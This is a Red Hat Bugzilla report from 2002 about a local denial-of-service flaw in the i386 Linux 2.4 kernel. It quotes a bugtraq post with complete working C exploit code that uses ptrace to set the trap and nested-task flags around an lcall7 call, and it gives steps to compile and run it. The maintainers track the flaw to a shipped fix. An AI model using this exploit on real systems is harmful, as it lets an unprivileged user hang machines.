Bug 77834 - Working Dos from bugtraq mailing list
Summary: Working Dos from bugtraq mailing list
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: kernel
Version: 8.0
Hardware: i686
OS: Linux
high
medium
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2002-11-14 07:42 UTC by Leonid Mamtchenkov
Modified: 2007-03-27 03:58 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2002-11-16 11:06:56 UTC
Embargoed:

Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2002:262 0 normal SHIPPED_LIVE : New kernel fixes local denial of service issue 2002-09-23 04:00:00 UTC
Red Hat Product Errata RHSA-2002:263 0 normal SHIPPED_LIVE Important: kernel security update 2002-09-23 04:00:00 UTC

Description Leonid Mamtchenkov 2002-11-14 07:42:49 UTC 
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
"
From: Christophe Devine <DEVINE.fr>
To: bugtraq
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS


On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

--
Christophe Devine
"

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):
kernel-2.4.18-17.8.0


How Reproducible:
Always

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:
Comment 1 Arjan van de Ven 2002-11-14 09:07:28 UTC 
yes we know about this; I built packages yesterday and they're in QA now
Comment 2 Arjan van de Ven 2002-11-16 11:06:56 UTC 
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2002-262.html
Comment 3 Frederic Hermann 2002-11-18 10:44:15 UTC 
This bug affect RedHat Linux 6.2 as well. I ran the program above on an up-to-
date RH6.2 box, as an unprivilegied user, and the box totally hang.
Note You need to log in before you can comment on or make changes to this bug.